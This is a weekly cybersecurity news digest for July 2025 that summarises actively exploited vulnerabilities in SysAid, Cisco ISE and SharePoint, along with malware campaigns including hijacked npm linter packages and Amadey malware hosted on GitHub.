07/16/2025-07/23/2025 SysAid Vulnerability Exploitation, Active Exploitation Of ISE and ISE-PIC Flaws, npm Linter Packages Hijacked And More.

1. CISA Warns of SysAid Vulnerability Exploitation

CISA has added two recently patched SysAid On-Prem vulnerabilities—CVE-2025-2776 and CVE-2025-2775—to its KEV catalog. Patched in March 2025 with version 24.4.60 of SysAid’s ITSM software, the flaws are pre-authentication XML external entity (XXE) issues discovered by WatchTowr in December 2024.

WatchTowr published proof-of-concept (PoC) exploit code in May 2025 and warned that the bugs could be chained with CVE-2024-36394, a separate OS command injection flaw, to enable unauthenticated remote command execution. Despite this, CVE-2024-36394 has not been added to the KEV list.

SysAid claims over 10 million users worldwide, though only 77 vulnerable internet-exposed instances were identified at disclosure. CISA notes there’s no evidence these flaws have been used in ransomware attacks. However, SysAid products have been previously targeted—most notably in 2023 by Cl0p ransomware exploiting a zero-day (CVE-2023-47246). 

2. Cisco Сonfirms Active Exploitation Of ISE and ISE-PIC Flaws

Cisco has confirmed active exploitation of critical vulnerabilities in its Identity Services Engine (ISE) and Passive Identity Connector (ISE-PIC), observed in July 2025. The flaws—CVE-2025-20281, CVE-2025-20282, and CVE-2025-20337—allow unauthenticated remote attackers to execute arbitrary code with root privileges.
The company warns that attackers are targeting these vulnerabilities in the wild and strongly urges customers to upgrade to fixed software versions. CVE-2025-20281 and CVE-2025-20282 (both CVSS 10) affect ISE/ISE-PIC versions 3.3+ and 3.4, respectively, enabling code execution via vulnerable or internal APIs due to poor input and file validation.

CVE-2025-20337, patched last week, is similar to CVE-2025-20281 and also allows root-level code execution. All three flaws stem from improper validation mechanisms, making it possible to upload malicious files or send crafted API requests.

3. Microsoft Releases Urgent Patch for SharePoint RCE Flaw Exploited in Ongoing Cyber Attacks

Microsoft has released patches for CVE-2025-53770, a critical remote code execution flaw (CVSS 9.8) in on-premises SharePoint Server actively exploited in the wild. The flaw stems from the deserialization of untrusted data. A related spoofing vulnerability, CVE-2025-53771 (CVSS 7.1), was also disclosed and patched with enhanced protections.

Both issues are tied to earlier flaws (CVE-2025-49704 and CVE-2025-49706) used in a ToolShell exploit chain patched in July 2025. Microsoft noted that CVE-2025-53770 is a variant of CVE-2025-49706.

Only on-premises SharePoint versions are affected, including Server 2016, 2019, and Subscription Edition. SharePoint Online is unaffected.

Customers are urged to apply the latest updates, enable AMSI in Full Mode, rotate ASP.NET machine keys, and restart IIS. Over 50 organizations, including banks and universities, have reportedly been compromised since July 18.

CISA has added CVE-2025-53770 to its Known Exploited Vulnerabilities catalog, mandating fixes for U.S. federal agencies by July 21, 2025.

4. EncryptHub Targets Web3 Developers Using Fake AI Platforms to Deploy Fickle Stealer Malware

Threat actor EncryptHub (aka LARVA-208/Water Gamayun) is targeting Web3 developers with stealer malware, using fake AI platforms like “Norlax AI” to lure victims through job offers and portfolio reviews. Swiss firm PRODAFT revealed the attackers trick targets into clicking meeting links sent via X, Telegram, or job board Remote3. An initial Google Meet call builds trust before redirecting victims to Norlax AI, where a fake audio driver error prompts malware download.

The malware, disguised as a Realtek audio driver, uses PowerShell to deploy Fickle Stealer, harvesting crypto wallets and dev credentials, then sending them to a server dubbed SilentPrism. This marks a shift in EncryptHub’s tactics from ransomware to data theft and resale.

5. Popular npm Linter Packages Hijacked via Phishing to Drop Malware

Several widely used JavaScript libraries, including eslint-config-prettier (30M+ weekly downloads), were hijacked in a supply chain attack after the maintainer, JounQin, fell for a phishing email mimicking npm support. Other impacted packages include eslint-plugin-prettier, synckit, @pkgr/core, and napi-postinstall.

On July 18, developers noticed suspicious behavior in versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7 of eslint-config-prettier, which lacked corresponding GitHub changes. The attacker used a stolen npm token to inject malicious postinstall scripts running install.js, which executed a trojanized DLL (node-gyp.dll) via Windows’ rundll32.
The malicious DLL is currently flagged by only 19 of 72 antivirus engines on VirusTotal.

Security researcher MalwareUtkonos also flagged a similar compromise of the got-fetch package by a different maintainer, suggesting the same threat actor is behind both attacks. That maintainer has since archived the GitHub repo and deprecated all versions.

Developers are urged to review affected packages and avoid installing compromised versions.

6. Hackers Use GitHub Repositories to Host Amadey Malware and Data Stealers, Bypassing Filters

Threat actors are abusing public GitHub repositories to host malicious payloads and distribute them via Amadey malware. The campaign involves fake GitHub accounts hosting Amadey plugins and tools, delivered using the Emmenhtal loader (aka PEAKLIGHT). The campaign mirrors a February 2025 phishing attack that distributed SmokeLoader via Emmenhtal, targeting Ukrainian organizations. In this latest campaign, Emmenhtal delivers Amadey, which can collect system data and deploy payloads like Lumma, RedLine, and Rhadamanthys Stealers. Some JavaScript and Python scripts in the GitHub repos are updated versions of Emmenhtal loaders.
GitHub has since taken down the fake accounts, but the activity reflects broader malware-as-a-service (MaaS) abuse of trusted platforms.

Meanwhile, Trellix reported SquidLoader targeting financial firms in Hong Kong. It employs advanced anti-analysis features and drops Cobalt Strike beacons.